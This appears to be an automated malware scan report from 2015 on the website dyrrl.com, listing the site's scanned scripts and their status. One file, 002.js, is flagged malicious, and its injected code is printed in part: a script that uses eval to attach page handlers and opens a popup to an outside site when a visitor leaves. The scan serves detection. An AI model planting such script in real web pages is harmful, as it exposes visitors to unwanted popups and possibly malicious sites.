Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dyrrl.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://dyrrl.com/ | HTTP/1.1 200 OK Date: Tue, 03 Mar 2015 02:07:09 GMT Accept-Ranges: bytes ETag: "07eb3d82c53d01:ca0" Server: Microsoft-IIS/6.0 Content-Length: 44156 Content-Location: http://dyrrl.com/index.html Content-Type: text/html Last-Modified: Sat, 28 Feb 2015 08:02:07 GMT X-Powered-By: ASP.NET | clean |
http://dyrrl.com/index.html | 200 OK Content-Length: 44156 Content-Type: text/html | clean |
http://dyrrl.com/js/common.js | 200 OK Content-Length: 9287 Content-Type: application/x-javascript | clean |
http://dyrrl.com/js/function.js | 200 OK Content-Length: 15586 Content-Type: application/x-javascript | clean |
http://dyrrl.com/001.js | 200 OK Content-Length: 592 Content-Type: application/x-javascript | clean |
http://dyrrl.com/002.js | 200 OK Content-Length: 1649 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- var isXPSP2 = false; var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6"; var str_url; str_url = window.location.search; function ext() { if(doexit) { doexit=false; if(!isXPSP2 && !usePopDialog) { window.open(popURL1,"",popWindowOptions); } els } function ver() { isXPSP2 = (window.navigator.userAgent.indexOf("SV1") != -1); if(isXPSP2) brs(); } var popURL1 = 'http://www.256ss.com/'; isUsingSpecial = true; if (str_url.indexOf("2005")!=-1 ||str_url.indexOf("2006")!=-1 ||str_url.indexOf("2007")!=-1) { } else { eval("window.attachEvent('onload',ver);"); eval("window.attachEvent('onunload',ext);"); } Antivirus reports:
| ||
http://dyrrl.com/js/ads/720.js | 200 OK Content-Length: 589 Content-Type: application/x-javascript | clean |
http://dyrrl.com/js/ads/qvod.js | 200 OK Content-Length: 132 Content-Type: application/x-javascript | clean |
http://dyrrl.com/js/ads/70t.js | 200 OK Content-Length: 111 Content-Type: application/x-javascript | clean |
http://dyrrl.com/js/ads/cyt.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://dyrrl.com/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://dyrrl.com/js/ads/70d.js | 200 OK Content-Length: 576 Content-Type: application/x-javascript | clean |
http://dyrrl.com/js/ads/840.js | 200 OK Content-Length: 232 Content-Type: application/x-javascript | clean |
http://dyrrl.com/js/ads/330.js | 200 OK Content-Length: 235 Content-Type: application/x-javascript | clean |
http://dyrrl.com/js/ads/dl99.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://dyrrl.com/js/ads/70p.js | 200 OK Content-Length: 109 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: dyrrl.com
Result:
HTTP/1.1 200 OK
Date: Tue, 03 Mar 2015 02:07:09 GMT
Accept-Ranges: bytes
ETag: "07eb3d82c53d01:ca0"
Server: Microsoft-IIS/6.0
Content-Length: 44156
Content-Location: http://dyrrl.com/index.html
Content-Type: text/html
Last-Modified: Sat, 28 Feb 2015 08:02:07 GMT
X-Powered-By: ASP.NET
...44156 bytes of data.
GET / HTTP/1.1
Host: dyrrl.com
Result:
HTTP/1.1 200 OK
Date: Tue, 03 Mar 2015 02:07:09 GMT
Accept-Ranges: bytes
ETag: "07eb3d82c53d01:ca0"
Server: Microsoft-IIS/6.0
Content-Length: 44156
Content-Location: http://dyrrl.com/index.html
Content-Type: text/html
Last-Modified: Sat, 28 Feb 2015 08:02:07 GMT
X-Powered-By: ASP.NET
...44156 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: dyrrl.com
Referer: http://www.google.com/search?q=dyrrl.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: dyrrl.com
Referer: http://www.google.com/search?q=dyrrl.com
Result:
The result is similar to the first query. There are no suspicious redirects found.